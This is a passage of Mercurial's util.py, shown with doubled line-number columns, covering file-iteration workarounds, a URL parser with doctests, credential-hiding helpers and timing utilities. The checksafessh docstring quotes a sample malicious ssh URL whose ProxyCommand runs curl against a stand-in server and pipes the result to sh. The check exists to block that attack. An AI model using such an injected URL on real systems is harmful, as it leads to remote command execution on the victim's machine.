2841 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2842 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2842 # --------------------------------------------------
2843 # --------------------------------------------------
2843 # fp.__iter__ | buggy | buggy | okay
2844 # fp.__iter__ | buggy | buggy | okay
2844 # fp.read* | buggy | okay [1] | okay
2845 # fp.read* | buggy | okay [1] | okay
2845 #
2846 #
2846 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2847 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2847 #
2848 #
2848 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2849 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2849 # like "read*" work fine, as we do not support Python < 2.7.4.
2850 # like "read*" work fine, as we do not support Python < 2.7.4.
2850 #
2851 #
2851 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2852 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2852 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2853 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2853 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2854 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2854 # fp.__iter__ but not other fp.read* methods.
2855 # fp.__iter__ but not other fp.read* methods.
2855 #
2856 #
2856 # On modern systems like Linux, the "read" syscall cannot be interrupted
2857 # On modern systems like Linux, the "read" syscall cannot be interrupted
2857 # when reading "fast" files like on-disk files. So the EINTR issue only
2858 # when reading "fast" files like on-disk files. So the EINTR issue only
2858 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2859 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2859 # files approximately as "fast" files and use the fast (unsafe) code path,
2860 # files approximately as "fast" files and use the fast (unsafe) code path,
2860 # to minimize the performance impact.
2861 # to minimize the performance impact.
2861
2862
2862 def iterfile(fp):
2863 def iterfile(fp):
2863 fastpath = True
2864 fastpath = True
2864 if type(fp) is file:
2865 if type(fp) is file:
2865 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2866 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2866 if fastpath:
2867 if fastpath:
2867 return fp
2868 return fp
2868 else:
2869 else:
2869 # fp.readline deals with EINTR correctly, use it as a workaround.
2870 # fp.readline deals with EINTR correctly, use it as a workaround.
2870 return iter(fp.readline, b'')
2871 return iter(fp.readline, b'')
2871
2872
2872
2873
2873 else:
2874 else:
2874 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2875 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2875 def iterfile(fp):
2876 def iterfile(fp):
2876 return fp
2877 return fp
2877
2878
2878
2879
2879 def iterlines(iterator):
2880 def iterlines(iterator):
2880 for chunk in iterator:
2881 for chunk in iterator:
2881 for line in chunk.splitlines():
2882 for line in chunk.splitlines():
2882 yield line
2883 yield line
2883
2884
2884
2885
2885 def expandpath(path):
2886 def expandpath(path):
2886 return os.path.expanduser(os.path.expandvars(path))
2887 return os.path.expanduser(os.path.expandvars(path))
2887
2888
2888
2889
2889 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2890 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2890 """Return the result of interpolating items in the mapping into string s.
2891 """Return the result of interpolating items in the mapping into string s.
2891
2892
2892 prefix is a single character string, or a two character string with
2893 prefix is a single character string, or a two character string with
2893 a backslash as the first character if the prefix needs to be escaped in
2894 a backslash as the first character if the prefix needs to be escaped in
2894 a regular expression.
2895 a regular expression.
2895
2896
2896 fn is an optional function that will be applied to the replacement text
2897 fn is an optional function that will be applied to the replacement text
2897 just before replacement.
2898 just before replacement.
2898
2899
2899 escape_prefix is an optional flag that allows using doubled prefix for
2900 escape_prefix is an optional flag that allows using doubled prefix for
2900 its escaping.
2901 its escaping.
2901 """
2902 """
2902 fn = fn or (lambda s: s)
2903 fn = fn or (lambda s: s)
2903 patterns = b'|'.join(mapping.keys())
2904 patterns = b'|'.join(mapping.keys())
2904 if escape_prefix:
2905 if escape_prefix:
2905 patterns += b'|' + prefix
2906 patterns += b'|' + prefix
2906 if len(prefix) > 1:
2907 if len(prefix) > 1:
2907 prefix_char = prefix[1:]
2908 prefix_char = prefix[1:]
2908 else:
2909 else:
2909 prefix_char = prefix
2910 prefix_char = prefix
2910 mapping[prefix_char] = prefix_char
2911 mapping[prefix_char] = prefix_char
2911 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2912 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2912 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2913 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2913
2914
2914
2915
2915 def getport(port):
2916 def getport(port):
2916 """Return the port for a given network service.
2917 """Return the port for a given network service.
2917
2918
2918 If port is an integer, it's returned as is. If it's a string, it's
2919 If port is an integer, it's returned as is. If it's a string, it's
2919 looked up using socket.getservbyname(). If there's no matching
2920 looked up using socket.getservbyname(). If there's no matching
2920 service, error.Abort is raised.
2921 service, error.Abort is raised.
2921 """
2922 """
2922 try:
2923 try:
2923 return int(port)
2924 return int(port)
2924 except ValueError:
2925 except ValueError:
2925 pass
2926 pass
2926
2927
2927 try:
2928 try:
2928 return socket.getservbyname(pycompat.sysstr(port))
2929 return socket.getservbyname(pycompat.sysstr(port))
2929 except socket.error:
2930 except socket.error:
2930 raise error.Abort(
2931 raise error.Abort(
2931 _(b"no port number associated with service '%s'") % port
2932 _(b"no port number associated with service '%s'") % port
2932 )
2933 )
2933
2934
2934
2935
2935 class url(object):
2936 class url(object):
2936 r"""Reliable URL parser.
2937 r"""Reliable URL parser.
2937
2938
2938 This parses URLs and provides attributes for the following
2939 This parses URLs and provides attributes for the following
2939 components:
2940 components:
2940
2941
2941 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2942 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2942
2943
2943 Missing components are set to None. The only exception is
2944 Missing components are set to None. The only exception is
2944 fragment, which is set to '' if present but empty.
2945 fragment, which is set to '' if present but empty.
2945
2946
2946 If parsefragment is False, fragment is included in query. If
2947 If parsefragment is False, fragment is included in query. If
2947 parsequery is False, query is included in path. If both are
2948 parsequery is False, query is included in path. If both are
2948 False, both fragment and query are included in path.
2949 False, both fragment and query are included in path.
2949
2950
2950 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2951 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2951
2952
2952 Note that for backward compatibility reasons, bundle URLs do not
2953 Note that for backward compatibility reasons, bundle URLs do not
2953 take host names. That means 'bundle://../' has a path of '../'.
2954 take host names. That means 'bundle://../' has a path of '../'.
2954
2955
2955 Examples:
2956 Examples:
2956
2957
2957 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2958 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2958 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2959 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2959 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2960 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2960 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2961 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2961 >>> url(b'file:///home/joe/repo')
2962 >>> url(b'file:///home/joe/repo')
2962 <url scheme: 'file', path: '/home/joe/repo'>
2963 <url scheme: 'file', path: '/home/joe/repo'>
2963 >>> url(b'file:///c:/temp/foo/')
2964 >>> url(b'file:///c:/temp/foo/')
2964 <url scheme: 'file', path: 'c:/temp/foo/'>
2965 <url scheme: 'file', path: 'c:/temp/foo/'>
2965 >>> url(b'bundle:foo')
2966 >>> url(b'bundle:foo')
2966 <url scheme: 'bundle', path: 'foo'>
2967 <url scheme: 'bundle', path: 'foo'>
2967 >>> url(b'bundle://../foo')
2968 >>> url(b'bundle://../foo')
2968 <url scheme: 'bundle', path: '../foo'>
2969 <url scheme: 'bundle', path: '../foo'>
2969 >>> url(br'c:\foo\bar')
2970 >>> url(br'c:\foo\bar')
2970 <url path: 'c:\\foo\\bar'>
2971 <url path: 'c:\\foo\\bar'>
2971 >>> url(br'\\blah\blah\blah')
2972 >>> url(br'\\blah\blah\blah')
2972 <url path: '\\\\blah\\blah\\blah'>
2973 <url path: '\\\\blah\\blah\\blah'>
2973 >>> url(br'\\blah\blah\blah#baz')
2974 >>> url(br'\\blah\blah\blah#baz')
2974 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2975 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2975 >>> url(br'file:///C:\users\me')
2976 >>> url(br'file:///C:\users\me')
2976 <url scheme: 'file', path: 'C:\\users\\me'>
2977 <url scheme: 'file', path: 'C:\\users\\me'>
2977
2978
2978 Authentication credentials:
2979 Authentication credentials:
2979
2980
2980 >>> url(b'ssh://joe:xyz@x/repo')
2981 >>> url(b'ssh://joe:xyz@x/repo')
2981 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2982 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2982 >>> url(b'ssh://joe@x/repo')
2983 >>> url(b'ssh://joe@x/repo')
2983 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2984 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2984
2985
2985 Query strings and fragments:
2986 Query strings and fragments:
2986
2987
2987 >>> url(b'http://host/a?b#c')
2988 >>> url(b'http://host/a?b#c')
2988 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2989 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2989 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2990 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2990 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2991 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2991
2992
2992 Empty path:
2993 Empty path:
2993
2994
2994 >>> url(b'')
2995 >>> url(b'')
2995 <url path: ''>
2996 <url path: ''>
2996 >>> url(b'#a')
2997 >>> url(b'#a')
2997 <url path: '', fragment: 'a'>
2998 <url path: '', fragment: 'a'>
2998 >>> url(b'http://host/')
2999 >>> url(b'http://host/')
2999 <url scheme: 'http', host: 'host', path: ''>
3000 <url scheme: 'http', host: 'host', path: ''>
3000 >>> url(b'http://host/#a')
3001 >>> url(b'http://host/#a')
3001 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3002 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3002
3003
3003 Only scheme:
3004 Only scheme:
3004
3005
3005 >>> url(b'http:')
3006 >>> url(b'http:')
3006 <url scheme: 'http'>
3007 <url scheme: 'http'>
3007 """
3008 """
3008
3009
3009 _safechars = b"!~*'()+"
3010 _safechars = b"!~*'()+"
3010 _safepchars = b"/!~*'()+:\\"
3011 _safepchars = b"/!~*'()+:\\"
3011 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3012 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3012
3013
3013 def __init__(self, path, parsequery=True, parsefragment=True):
3014 def __init__(self, path, parsequery=True, parsefragment=True):
3014 # We slowly chomp away at path until we have only the path left
3015 # We slowly chomp away at path until we have only the path left
3015 self.scheme = self.user = self.passwd = self.host = None
3016 self.scheme = self.user = self.passwd = self.host = None
3016 self.port = self.path = self.query = self.fragment = None
3017 self.port = self.path = self.query = self.fragment = None
3017 self._localpath = True
3018 self._localpath = True
3018 self._hostport = b''
3019 self._hostport = b''
3019 self._origpath = path
3020 self._origpath = path
3020
3021
3021 if parsefragment and b'#' in path:
3022 if parsefragment and b'#' in path:
3022 path, self.fragment = path.split(b'#', 1)
3023 path, self.fragment = path.split(b'#', 1)
3023
3024
3024 # special case for Windows drive letters and UNC paths
3025 # special case for Windows drive letters and UNC paths
3025 if hasdriveletter(path) or path.startswith(b'\\\\'):
3026 if hasdriveletter(path) or path.startswith(b'\\\\'):
3026 self.path = path
3027 self.path = path
3027 return
3028 return
3028
3029
3029 # For compatibility reasons, we can't handle bundle paths as
3030 # For compatibility reasons, we can't handle bundle paths as
3030 # normal URLS
3031 # normal URLS
3031 if path.startswith(b'bundle:'):
3032 if path.startswith(b'bundle:'):
3032 self.scheme = b'bundle'
3033 self.scheme = b'bundle'
3033 path = path[7:]
3034 path = path[7:]
3034 if path.startswith(b'//'):
3035 if path.startswith(b'//'):
3035 path = path[2:]
3036 path = path[2:]
3036 self.path = path
3037 self.path = path
3037 return
3038 return
3038
3039
3039 if self._matchscheme(path):
3040 if self._matchscheme(path):
3040 parts = path.split(b':', 1)
3041 parts = path.split(b':', 1)
3041 if parts[0]:
3042 if parts[0]:
3042 self.scheme, path = parts
3043 self.scheme, path = parts
3043 self._localpath = False
3044 self._localpath = False
3044
3045
3045 if not path:
3046 if not path:
3046 path = None
3047 path = None
3047 if self._localpath:
3048 if self._localpath:
3048 self.path = b''
3049 self.path = b''
3049 return
3050 return
3050 else:
3051 else:
3051 if self._localpath:
3052 if self._localpath:
3052 self.path = path
3053 self.path = path
3053 return
3054 return
3054
3055
3055 if parsequery and b'?' in path:
3056 if parsequery and b'?' in path:
3056 path, self.query = path.split(b'?', 1)
3057 path, self.query = path.split(b'?', 1)
3057 if not path:
3058 if not path:
3058 path = None
3059 path = None
3059 if not self.query:
3060 if not self.query:
3060 self.query = None
3061 self.query = None
3061
3062
3062 # // is required to specify a host/authority
3063 # // is required to specify a host/authority
3063 if path and path.startswith(b'//'):
3064 if path and path.startswith(b'//'):
3064 parts = path[2:].split(b'/', 1)
3065 parts = path[2:].split(b'/', 1)
3065 if len(parts) > 1:
3066 if len(parts) > 1:
3066 self.host, path = parts
3067 self.host, path = parts
3067 else:
3068 else:
3068 self.host = parts[0]
3069 self.host = parts[0]
3069 path = None
3070 path = None
3070 if not self.host:
3071 if not self.host:
3071 self.host = None
3072 self.host = None
3072 # path of file:///d is /d
3073 # path of file:///d is /d
3073 # path of file:///d:/ is d:/, not /d:/
3074 # path of file:///d:/ is d:/, not /d:/
3074 if path and not hasdriveletter(path):
3075 if path and not hasdriveletter(path):
3075 path = b'/' + path
3076 path = b'/' + path
3076
3077
3077 if self.host and b'@' in self.host:
3078 if self.host and b'@' in self.host:
3078 self.user, self.host = self.host.rsplit(b'@', 1)
3079 self.user, self.host = self.host.rsplit(b'@', 1)
3079 if b':' in self.user:
3080 if b':' in self.user:
3080 self.user, self.passwd = self.user.split(b':', 1)
3081 self.user, self.passwd = self.user.split(b':', 1)
3081 if not self.host:
3082 if not self.host:
3082 self.host = None
3083 self.host = None
3083
3084
3084 # Don't split on colons in IPv6 addresses without ports
3085 # Don't split on colons in IPv6 addresses without ports
3085 if (
3086 if (
3086 self.host
3087 self.host
3087 and b':' in self.host
3088 and b':' in self.host
3088 and not (
3089 and not (
3089 self.host.startswith(b'[') and self.host.endswith(b']')
3090 self.host.startswith(b'[') and self.host.endswith(b']')
3090 )
3091 )
3091 ):
3092 ):
3092 self._hostport = self.host
3093 self._hostport = self.host
3093 self.host, self.port = self.host.rsplit(b':', 1)
3094 self.host, self.port = self.host.rsplit(b':', 1)
3094 if not self.host:
3095 if not self.host:
3095 self.host = None
3096 self.host = None
3096
3097
3097 if (
3098 if (
3098 self.host
3099 self.host
3099 and self.scheme == b'file'
3100 and self.scheme == b'file'
3100 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3101 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3101 ):
3102 ):
3102 raise error.Abort(
3103 raise error.Abort(
3103 _(b'file:// URLs can only refer to localhost')
3104 _(b'file:// URLs can only refer to localhost')
3104 )
3105 )
3105
3106
3106 self.path = path
3107 self.path = path
3107
3108
3108 # leave the query string escaped
3109 # leave the query string escaped
3109 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3110 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3110 v = getattr(self, a)
3111 v = getattr(self, a)
3111 if v is not None:
3112 if v is not None:
3112 setattr(self, a, urlreq.unquote(v))
3113 setattr(self, a, urlreq.unquote(v))
3113
3114
3114 @encoding.strmethod
3115 @encoding.strmethod
3115 def __repr__(self):
3116 def __repr__(self):
3116 attrs = []
3117 attrs = []
3117 for a in (
3118 for a in (
3118 b'scheme',
3119 b'scheme',
3119 b'user',
3120 b'user',
3120 b'passwd',
3121 b'passwd',
3121 b'host',
3122 b'host',
3122 b'port',
3123 b'port',
3123 b'path',
3124 b'path',
3124 b'query',
3125 b'query',
3125 b'fragment',
3126 b'fragment',
3126 ):
3127 ):
3127 v = getattr(self, a)
3128 v = getattr(self, a)
3128 if v is not None:
3129 if v is not None:
3129 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3130 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3130 return b'<url %s>' % b', '.join(attrs)
3131 return b'<url %s>' % b', '.join(attrs)
3131
3132
3132 def __bytes__(self):
3133 def __bytes__(self):
3133 r"""Join the URL's components back into a URL string.
3134 r"""Join the URL's components back into a URL string.
3134
3135
3135 Examples:
3136 Examples:
3136
3137
3137 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3138 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3138 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3139 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3139 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3140 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3140 'http://user:pw@host:80/?foo=bar&baz=42'
3141 'http://user:pw@host:80/?foo=bar&baz=42'
3141 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3142 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3142 'http://user:pw@host:80/?foo=bar%3dbaz'
3143 'http://user:pw@host:80/?foo=bar%3dbaz'
3143 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3144 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3144 'ssh://user:pw@[::1]:2200//home/joe#'
3145 'ssh://user:pw@[::1]:2200//home/joe#'
3145 >>> bytes(url(b'http://localhost:80//'))
3146 >>> bytes(url(b'http://localhost:80//'))
3146 'http://localhost:80//'
3147 'http://localhost:80//'
3147 >>> bytes(url(b'http://localhost:80/'))
3148 >>> bytes(url(b'http://localhost:80/'))
3148 'http://localhost:80/'
3149 'http://localhost:80/'
3149 >>> bytes(url(b'http://localhost:80'))
3150 >>> bytes(url(b'http://localhost:80'))
3150 'http://localhost:80/'
3151 'http://localhost:80/'
3151 >>> bytes(url(b'bundle:foo'))
3152 >>> bytes(url(b'bundle:foo'))
3152 'bundle:foo'
3153 'bundle:foo'
3153 >>> bytes(url(b'bundle://../foo'))
3154 >>> bytes(url(b'bundle://../foo'))
3154 'bundle:../foo'
3155 'bundle:../foo'
3155 >>> bytes(url(b'path'))
3156 >>> bytes(url(b'path'))
3156 'path'
3157 'path'
3157 >>> bytes(url(b'file:///tmp/foo/bar'))
3158 >>> bytes(url(b'file:///tmp/foo/bar'))
3158 'file:///tmp/foo/bar'
3159 'file:///tmp/foo/bar'
3159 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3160 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3160 'file:///c:/tmp/foo/bar'
3161 'file:///c:/tmp/foo/bar'
3161 >>> print(url(br'bundle:foo\bar'))
3162 >>> print(url(br'bundle:foo\bar'))
3162 bundle:foo\bar
3163 bundle:foo\bar
3163 >>> print(url(br'file:///D:\data\hg'))
3164 >>> print(url(br'file:///D:\data\hg'))
3164 file:///D:\data\hg
3165 file:///D:\data\hg
3165 """
3166 """
3166 if self._localpath:
3167 if self._localpath:
3167 s = self.path
3168 s = self.path
3168 if self.scheme == b'bundle':
3169 if self.scheme == b'bundle':
3169 s = b'bundle:' + s
3170 s = b'bundle:' + s
3170 if self.fragment:
3171 if self.fragment:
3171 s += b'#' + self.fragment
3172 s += b'#' + self.fragment
3172 return s
3173 return s
3173
3174
3174 s = self.scheme + b':'
3175 s = self.scheme + b':'
3175 if self.user or self.passwd or self.host:
3176 if self.user or self.passwd or self.host:
3176 s += b'//'
3177 s += b'//'
3177 elif self.scheme and (
3178 elif self.scheme and (
3178 not self.path
3179 not self.path
3179 or self.path.startswith(b'/')
3180 or self.path.startswith(b'/')
3180 or hasdriveletter(self.path)
3181 or hasdriveletter(self.path)
3181 ):
3182 ):
3182 s += b'//'
3183 s += b'//'
3183 if hasdriveletter(self.path):
3184 if hasdriveletter(self.path):
3184 s += b'/'
3185 s += b'/'
3185 if self.user:
3186 if self.user:
3186 s += urlreq.quote(self.user, safe=self._safechars)
3187 s += urlreq.quote(self.user, safe=self._safechars)
3187 if self.passwd:
3188 if self.passwd:
3188 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3189 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3189 if self.user or self.passwd:
3190 if self.user or self.passwd:
3190 s += b'@'
3191 s += b'@'
3191 if self.host:
3192 if self.host:
3192 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3193 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3193 s += urlreq.quote(self.host)
3194 s += urlreq.quote(self.host)
3194 else:
3195 else:
3195 s += self.host
3196 s += self.host
3196 if self.port:
3197 if self.port:
3197 s += b':' + urlreq.quote(self.port)
3198 s += b':' + urlreq.quote(self.port)
3198 if self.host:
3199 if self.host:
3199 s += b'/'
3200 s += b'/'
3200 if self.path:
3201 if self.path:
3201 # TODO: similar to the query string, we should not unescape the
3202 # TODO: similar to the query string, we should not unescape the
3202 # path when we store it, the path might contain '%2f' = '/',
3203 # path when we store it, the path might contain '%2f' = '/',
3203 # which we should *not* escape.
3204 # which we should *not* escape.
3204 s += urlreq.quote(self.path, safe=self._safepchars)
3205 s += urlreq.quote(self.path, safe=self._safepchars)
3205 if self.query:
3206 if self.query:
3206 # we store the query in escaped form.
3207 # we store the query in escaped form.
3207 s += b'?' + self.query
3208 s += b'?' + self.query
3208 if self.fragment is not None:
3209 if self.fragment is not None:
3209 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3210 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3210 return s
3211 return s
3211
3212
3212 __str__ = encoding.strmethod(__bytes__)
3213 __str__ = encoding.strmethod(__bytes__)
3213
3214
3214 def authinfo(self):
3215 def authinfo(self):
3215 user, passwd = self.user, self.passwd
3216 user, passwd = self.user, self.passwd
3216 try:
3217 try:
3217 self.user, self.passwd = None, None
3218 self.user, self.passwd = None, None
3218 s = bytes(self)
3219 s = bytes(self)
3219 finally:
3220 finally:
3220 self.user, self.passwd = user, passwd
3221 self.user, self.passwd = user, passwd
3221 if not self.user:
3222 if not self.user:
3222 return (s, None)
3223 return (s, None)
3223 # authinfo[1] is passed to urllib2 password manager, and its
3224 # authinfo[1] is passed to urllib2 password manager, and its
3224 # URIs must not contain credentials. The host is passed in the
3225 # URIs must not contain credentials. The host is passed in the
3225 # URIs list because Python < 2.4.3 uses only that to search for
3226 # URIs list because Python < 2.4.3 uses only that to search for
3226 # a password.
3227 # a password.
3227 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3228 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3228
3229
3229 def isabs(self):
3230 def isabs(self):
3230 if self.scheme and self.scheme != b'file':
3231 if self.scheme and self.scheme != b'file':
3231 return True # remote URL
3232 return True # remote URL
3232 if hasdriveletter(self.path):
3233 if hasdriveletter(self.path):
3233 return True # absolute for our purposes - can't be joined()
3234 return True # absolute for our purposes - can't be joined()
3234 if self.path.startswith(br'\\'):
3235 if self.path.startswith(br'\\'):
3235 return True # Windows UNC path
3236 return True # Windows UNC path
3236 if self.path.startswith(b'/'):
3237 if self.path.startswith(b'/'):
3237 return True # POSIX-style
3238 return True # POSIX-style
3238 return False
3239 return False
3239
3240
3240 def localpath(self):
3241 def localpath(self):
3241 if self.scheme == b'file' or self.scheme == b'bundle':
3242 if self.scheme == b'file' or self.scheme == b'bundle':
3242 path = self.path or b'/'
3243 path = self.path or b'/'
3243 # For Windows, we need to promote hosts containing drive
3244 # For Windows, we need to promote hosts containing drive
3244 # letters to paths with drive letters.
3245 # letters to paths with drive letters.
3245 if hasdriveletter(self._hostport):
3246 if hasdriveletter(self._hostport):
3246 path = self._hostport + b'/' + self.path
3247 path = self._hostport + b'/' + self.path
3247 elif (
3248 elif (
3248 self.host is not None and self.path and not hasdriveletter(path)
3249 self.host is not None and self.path and not hasdriveletter(path)
3249 ):
3250 ):
3250 path = b'/' + path
3251 path = b'/' + path
3251 return path
3252 return path
3252 return self._origpath
3253 return self._origpath
3253
3254
3254 def islocal(self):
3255 def islocal(self):
3255 '''whether localpath will return something that posixfile can open'''
3256 '''whether localpath will return something that posixfile can open'''
3256 return (
3257 return (
3257 not self.scheme
3258 not self.scheme
3258 or self.scheme == b'file'
3259 or self.scheme == b'file'
3259 or self.scheme == b'bundle'
3260 or self.scheme == b'bundle'
3260 )
3261 )
3261
3262
3262
3263
3263 def hasscheme(path):
3264 def hasscheme(path):
3264 return bool(url(path).scheme)
3265 return bool(url(path).scheme)
3265
3266
3266
3267
3267 def hasdriveletter(path):
3268 def hasdriveletter(path):
3268 return path and path[1:2] == b':' and path[0:1].isalpha()
3269 return path and path[1:2] == b':' and path[0:1].isalpha()
3269
3270
3270
3271
3271 def urllocalpath(path):
3272 def urllocalpath(path):
3272 return url(path, parsequery=False, parsefragment=False).localpath()
3273 return url(path, parsequery=False, parsefragment=False).localpath()
3273
3274
3274
3275
3275 def checksafessh(path):
3276 def checksafessh(path):
3276 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3277 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3277
3278
3278 This is a sanity check for ssh urls. ssh will parse the first item as
3279 This is a sanity check for ssh urls. ssh will parse the first item as
3279 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3280 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3280 Let's prevent these potentially exploited urls entirely and warn the
3281 Let's prevent these potentially exploited urls entirely and warn the
3281 user.
3282 user.
3282
3283
3283 Raises an error.Abort when the url is unsafe.
3284 Raises an error.Abort when the url is unsafe.
3284 """
3285 """
3285 path = urlreq.unquote(path)
3286 path = urlreq.unquote(path)
3286 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3287 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3287 raise error.Abort(
3288 raise error.Abort(
3288 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3289 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3289 )
3290 )
3290
3291
3291
3292
3292 def hidepassword(u):
3293 def hidepassword(u):
3293 '''hide user credential in a url string'''
3294 '''hide user credential in a url string'''
3294 u = url(u)
3295 u = url(u)
3295 if u.passwd:
3296 if u.passwd:
3296 u.passwd = b'***'
3297 u.passwd = b'***'
3297 return bytes(u)
3298 return bytes(u)
3298
3299
3299
3300
3300 def removeauth(u):
3301 def removeauth(u):
3301 '''remove all authentication information from a url string'''
3302 '''remove all authentication information from a url string'''
3302 u = url(u)
3303 u = url(u)
3303 u.user = u.passwd = None
3304 u.user = u.passwd = None
3304 return bytes(u)
3305 return bytes(u)
3305
3306
3306
3307
3307 timecount = unitcountfn(
3308 timecount = unitcountfn(
3308 (1, 1e3, _(b'%.0f s')),
3309 (1, 1e3, _(b'%.0f s')),
3309 (100, 1, _(b'%.1f s')),
3310 (100, 1, _(b'%.1f s')),
3310 (10, 1, _(b'%.2f s')),
3311 (10, 1, _(b'%.2f s')),
3311 (1, 1, _(b'%.3f s')),
3312 (1, 1, _(b'%.3f s')),
3312 (100, 0.001, _(b'%.1f ms')),
3313 (100, 0.001, _(b'%.1f ms')),
3313 (10, 0.001, _(b'%.2f ms')),
3314 (10, 0.001, _(b'%.2f ms')),
3314 (1, 0.001, _(b'%.3f ms')),
3315 (1, 0.001, _(b'%.3f ms')),
3315 (100, 0.000001, _(b'%.1f us')),
3316 (100, 0.000001, _(b'%.1f us')),
3316 (10, 0.000001, _(b'%.2f us')),
3317 (10, 0.000001, _(b'%.2f us')),
3317 (1, 0.000001, _(b'%.3f us')),
3318 (1, 0.000001, _(b'%.3f us')),
3318 (100, 0.000000001, _(b'%.1f ns')),
3319 (100, 0.000000001, _(b'%.1f ns')),
3319 (10, 0.000000001, _(b'%.2f ns')),
3320 (10, 0.000000001, _(b'%.2f ns')),
3320 (1, 0.000000001, _(b'%.3f ns')),
3321 (1, 0.000000001, _(b'%.3f ns')),
3321 )
3322 )
3322
3323
3323
3324
3324 @attr.s
3325 @attr.s
3325 class timedcmstats(object):
3326 class timedcmstats(object):
3326 """Stats information produced by the timedcm context manager on entering."""
3327 """Stats information produced by the timedcm context manager on entering."""
3327
3328
3328 # the starting value of the timer as a float (meaning and resulution is
3329 # the starting value of the timer as a float (meaning and resulution is
3329 # platform dependent, see util.timer)
3330 # platform dependent, see util.timer)
3330 start = attr.ib(default=attr.Factory(lambda: timer()))
3331 start = attr.ib(default=attr.Factory(lambda: timer()))
3331 # the number of seconds as a floating point value; starts at 0, updated when
3332 # the number of seconds as a floating point value; starts at 0, updated when
3332 # the context is exited.
3333 # the context is exited.
